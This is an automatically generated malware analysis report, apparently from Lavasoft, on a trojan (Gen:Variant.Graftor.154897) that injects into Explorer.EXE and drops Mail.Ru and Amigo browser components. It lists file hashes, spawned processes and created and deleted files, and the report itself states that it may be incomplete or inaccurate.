Gen.Variant.Graftor.154897_f22a3905b8

by malwarelabrobot on September 23rd, 2014 in Malware Descriptions.

Trojan.Win32.Vundo.qu (Kaspersky), Gen:Variant.Graftor.154897 (B) (Emsisoft), Gen:Variant.Graftor.154897 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: f22a3905b8d7503a3bd9ba6e59ea68df
SHA1: aa6189c2c3595fcb34b65d8cc7716a9fb7ed6b88
SHA256: 38584f735bb07835c923651a532768edb3399e67541ddd412efb0095b8619ead
SSDeep: 6144:noAFhMhdpHqVwoV699zChWMQj8MMMMMMe:trM7pHqVwgiYMMMMMMe
Size: 339968 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2014-09-10 11:50:39
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

mailruhomesearch.exe:656
dwwin.exe:1300
amigo.exe:488
MailRuUpdater.exe:820
MailRuUpdater.exe:1772
AmigoDistrib.exe:324
r45215.exe:884
Winhlp313.exe:1944
%original file name%.exe:1756
setup.exe:1968

The Trojan injects its code into the following process(es):

Explorer.EXE:1572

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process mailruhomesearch.exe:656 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Favorites\Mail.Ru Агент - используй для общения!.url (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\GoMailRu.ico (16428 bytes)
%Documents and Settings%\All Users\Favorites\Mail.Ru.url (152 bytes)
%Documents and Settings%\%current user%\Desktop\Искать в Интернете.url (209 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Mail.Ru.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\Sputnik\MailRu.ico (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Mail.Ru.lnk (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3AFAC384B4FC462E80BD9675BAC66A1A.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Mail.Ru.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\662D44269F6C463A83FFDB432578F678.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8E1B0EA9E4EA41E4BC0F320FE217EEB1.html (0 bytes)

The process dwwin.exe:1300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\8FEEA.dmp (99830 bytes)

The process amigo.exe:488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\debug.log (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\User Data\1.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\User Data\2.tmp (5 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\User Data\Local State~RF8eba1.TMP (0 bytes)

The process MailRuUpdater.exe:820 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe (46100 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru (0 bytes)

The process MailRuUpdater.exe:1772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\fcf4_appcompat.txt (3002 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\554FCC71829B4FCBA168EF634A7393B8.html (0 bytes)

The process AmigoDistrib.exe:324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CR_FA880.tmp\SETUP.EX_ (1696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_FA880.tmp\setup.exe (18208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_FA880.tmp\CHROME.PACKED.7Z (373523 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CR_FA880.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_FA880.tmp\SETUP.EX_ (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_FA880.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_FA880.tmp\CHROME.PACKED.7Z (0 bytes)

The process r45215.exe:884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\mailruhomesearch.exe.xdl! (50143 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\AmigoDistrib.exe.xdl! (382822 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\456FK5AF\mailruhomesearch[1].exe (50143 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\456FK5AF\AmigoDistrib[1].exe (382822 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\AmigoDistrib.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mailruhomesearch.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\456FK5AF\mailruhomesearch[1].exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\456FK5AF\AmigoDistrib[1].exe (0 bytes)

The process Winhlp313.exe:1944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\r45215.exe (76 bytes)

The process %original file name%.exe:1756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\My Documents\CommonData\Winhlp313.exe (110080 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SPA30XYZ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\K5YV8XYR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\456FK5AF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\busy (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\41U7GHIN\desktop.ini (67 bytes)

The process setup.exe:1968 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\mr.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\lv.pak (234 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ro.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Вконтакте.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\am.pak (323 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\mailruupdater.exe (45823 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\master_preferences (982 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\pl.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\vk.exe (167 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\zh-CN.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\id.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\da.pak (213 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ms.pak (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\bn.pak (1769 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\et.dll (10 bytes)
%Documents and Settings%\%current user%\Desktop\Amigo.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ja.pak (282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ms.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\fa.pak (1611 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Одноклассники.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\cs.pak (234 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\es.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\uk.pak (1648 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ca.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\ppgooglenaclpluginchrome.dll (1747 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\lt.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\el.pak (1699 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\nl.pak (226 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Вконтакте.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\hi.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\nb.pak (213 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\VisualElements\splash-620x300.png (35 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Amigo.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\gcswf32.dll (100429 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sv.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ar.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\ok.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\chrome_frame_helper.dll (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sw.pak (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\zh-CN.pak (192 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\chrome_100_percent.pak (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\vk.exe (673 bytes)
%Documents and Settings%\%current user%\Desktop\Вконтакте.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\he.pak (266 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\VisualElements\smalllogo.png (14 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Amigo.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ar.pak (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ru.pak (1642 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\delegate_execute.exe (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\chrome_installer.log (972 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ru.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\uk.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ja.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\d3dcompiler_46.dll (22433 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ml.pak (3679 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\wow_helper.exe (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\chrome.exe (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\gu.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\hu.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\libegl.dll (109 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\pt-BR.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\resources.pak (180073 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\fr.pak (251 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sl.pak (218 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sr.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\fr.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\en-GB.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\pt-PT.pak (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\chrome_touch_100_percent.pak (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\hr.pak (222 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\hr.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\fi.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\pl.pak (229 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\zh-TW.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ta.pak (1829 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Одноклассники.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\npchrome_frame.dll (15801 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\fi.pak (220 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\chrome_child.dll (286042 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\te.pak (1805 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\am.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\it.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sk.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\chrome_frame_helper.exe (85 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\da.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\kn.pak (1815 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\kn.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\es.pak (242 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\fa.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\en-US.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\el.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\bn.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\id.pak (209 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\th.pak (1745 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ro.pak (242 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ko.pak (239 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\nacl_irt_x86_64.nexe (28502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\nb.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\de.pak (234 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\es-419.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sr.pak (1636 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\it.pak (229 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\tr.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\master_preferences (982 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\libglesv2.dll (6349 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ml.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sv.pak (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\ok.exe (142 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\VisualElementsManifest.xml (391 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\32.0.1705.153\Installer\setup.exe (7971 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\icudt.dll (72365 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\tr.pak (231 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\te.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sk.pak (241 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\bg.pak (1668 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\nl.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\he.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sw.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\mr.pak (1748 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\zh-TW.pak (195 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\lv.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\vi.pak (263 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\VisualElements\logo.png (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\cs.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\vi.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\hi.pak (1754 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\amigo.exe (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\th.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\en-US.pak (195 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\pt-BR.pak (226 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\bg.dll (10 bytes)
%Documents and Settings%\%current user%\Desktop\Одноклассники.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\extensions\external_extensions.json (103 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\sl.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\et.pak (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ta.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\chrome_launcher.exe (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\de.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\nacl64.exe (12289 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\es-419.pak (237 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\lt.pak (231 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\MailRu\MailRuUpdater.exe (46100 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\nacl_irt_x86_32.nexe (42362 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\pt-PT.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ko.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\ca.pak (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\hu.pak (246 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\fil.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\secondarytile.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\ffmpegsumo.dll (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\en-GB.pak (195 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\chrome.7z (1326482 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\fil.pak (239 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\metro_driver.dll (1747 bytes)
